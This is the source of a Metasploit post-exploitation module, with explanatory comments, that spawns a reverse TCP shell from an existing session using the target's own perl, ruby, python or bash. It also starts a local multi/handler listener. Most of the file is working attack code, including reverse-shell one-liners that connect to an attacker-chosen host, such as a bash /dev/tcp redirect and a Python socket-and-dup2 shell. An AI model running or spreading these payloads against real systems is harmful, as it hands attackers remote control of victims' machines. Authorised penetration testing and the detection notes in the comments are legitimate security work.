GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/manage/system_session.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module that spawns an additional reverse TCP shell from an existing
# session, using whichever interpreter (perl, ruby, python or bash) the
# target already has installed. The module itself writes nothing to disk:
# the shell is a one-liner handed to the interpreter through cmd_exec, and
# that full command line — LHOST and LPORT included — is what the
# IOC_IN_LOGS side-effect note refers to.
class MetasploitModule < Msf::Post

  # Module metadata and options.
  #
  # LHOST   - local address the new shell connects back to (required).
  # LPORT   - port for that connection (default 4433).
  # HANDLER - when true, start a local exploit/multi/handler job first.
  # TYPE    - interpreter to use; 'auto' probes the target in a fixed order
  #           (see auto_create_session).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Manage System Remote TCP Shell Session',
        'Description' => %q{
          This module will create a Reverse TCP Shell on the target system
          using the system's own scripting environments installed on the
          target.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => %w[linux osx unix],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The interpreter command line carries LHOST/LPORT in the clear.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        OptAddressLocal.new('LHOST',
                            [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT',
                   [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),
        OptEnum.new('TYPE', [
          true, 'Scripting environment on target to use for reverse shell',
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']
        ])
      ]
    )
  end

  # Entry point: optionally starts the local handler, builds the one-liner
  # for the selected TYPE, then runs it on the target in a backgrounded
  # subshell.
  #
  # Note that the handler is started before the target has been probed, so
  # with HANDLER=true a host that has none of the four interpreters still
  # leaves a multi/handler job running locally.
  def run
    create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']
    lhost = datastore['LHOST']
    lport = datastore['LPORT']
    cmd = ''

    begin
      # TYPE is an OptEnum restricted to the five listed values, so the
      # case-insensitive regexes are defensive rather than necessary.
      case datastore['TYPE']
      when /auto/i
        cmd = auto_create_session(lhost, lport)
      when /ruby/i
        cmd = ruby_session(lhost, lport)
      when /python/i
        cmd = python_session(lhost, lport)
      when /perl/i
        cmd = perl_session(lhost, lport)
      when /bash/i
        cmd = bash_session(lhost, lport)
      end
    rescue StandardError => e
      # A failure while probing or building the command is only reported
      # under VERBOSE; cmd stays '' and nothing is executed below.
      vprint_error(e.message)
    end

    if !cmd.empty?
      print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
      # "( ... &)" backgrounds the interpreter in a subshell so cmd_exec is
      # not left waiting on the new shell's lifetime.
      cmd_exec("(#{cmd} &)")
    end
  end

  # Probes the target for interpreters in a fixed priority order (perl,
  # ruby, python, bash) and returns the one-liner for the first one found,
  # or '' if none matched. Each probe matches a fixed banner substring, so
  # an interpreter whose version output differs is treated as absent — the
  # python check in particular only accepts a "Python 2.x" banner. The
  # *_session helper that is then called repeats the same probe, so the
  # winning interpreter is queried twice on the target.
  def auto_create_session(lhost, lport)
    cmd = ''

    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl was found on target')
      cmd = perl_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby was found on target')
      cmd = ruby_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python was found on target')
      cmd = python_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash was found on target')
      cmd = bash_session(lhost, lport)
      vprint_status("Running #{cmd}")
    else
      print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')
    end

    return cmd
  end

  # Checks the framework's running jobs for a multi/handler already bound to
  # the given LHOST/LPORT. Returns true if such a job exists (a conflict),
  # false otherwise. The job name is matched with a leading space
  # (%r{ multi/handler}); the port is compared via .to_i, which suggests the
  # job datastore may hold LPORT as a string — confirm against the
  # framework. The method name keeps its original spelling ("listner")
  # because it is called by name from create_multihand.
  def check_for_listner(lhost, lport)
    conflict = false
    client.framework.jobs.each_value do |j|
      next unless j.name =~ %r{ multi/handler}

      current_id = j.jid
      current_lhost = j.ctx[0].datastore['LHOST']
      current_lport = j.ctx[0].datastore['LPORT']
      if (lhost == current_lhost) && (lport == current_lport.to_i)
        print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
        conflict = true
      end
    end
    return conflict
  end

  # Starts an exploit/multi/handler job for generic/shell_reverse_tcp on
  # lhost:lport, unless check_for_listner reports that one is already bound
  # there. The payload instance is created only to obtain a datastore that
  # is then shared with the handler; ExitOnSession=false keeps the job up
  # after the first session connects.
  def create_multihand(lhost, lport)
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    print_status('Starting exploit/multi/handler')
    if !check_for_listner(lhost, lport)
      # Set options for module
      mul = client.framework.exploits.create('multi/handler')
      mul.share_datastore(pay.datastore)
      mul.datastore['WORKSPACE'] = client.workspace
      mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
      mul.datastore['EXITFUNC'] = 'thread'
      mul.datastore['ExitOnSession'] = false
      # Validate module options
      mul.options.validate(mul.datastore)
      # Execute showing output, detached as a framework job
      mul.exploit_simple(
        'Payload' => mul.datastore['PAYLOAD'],
        'LocalInput' => user_input,
        'LocalOutput' => user_output,
        'RunAsJob' => true
      )
    else
      print_error('Could not start handler!')
      print_error('A job is listening on the same Port')
    end
  end

  # Perl reverse TCP shell. Re-probes `perl -v` and returns '' (after an
  # error message) when the banner does not match. The one-liner forks and
  # exits the parent, so the process that holds the connection is typically
  # reparented rather than a direct child of the session's shell — relevant
  # when tracing the connection back to its origin.
  def perl_session(lhost, lport)
    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl reverse shell selected')
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \
            "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Ruby reverse TCP shell. Re-probes `ruby -v` and returns '' (after an
  # error message) when the banner does not match. Like the Perl variant it
  # forks and exits the parent. The match branch returns directly; the
  # trailing `return cmd` is only reached from the else branch.
  def ruby_session(lhost, lport)
    if cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby reverse shell selected')
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \
             "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Python reverse TCP shell. Only a "Python 2.x" banner from `python -V` is
  # accepted; any other interpreter is treated as absent and '' is returned
  # after an error message. The match branch returns directly.
  def python_session(lhost, lport)
    if cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python reverse shell selected')
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
             "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \
             "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Bash reverse TCP shell using bash's /dev/tcp pseudo-device, so no
  # external binary is involved. Requires a "GNU bash" banner from
  # `bash --version`; otherwise '' is returned after an error message. The
  # match branch returns directly.
  def bash_session(lhost, lport)
    if cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash reverse shell selected')
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end
end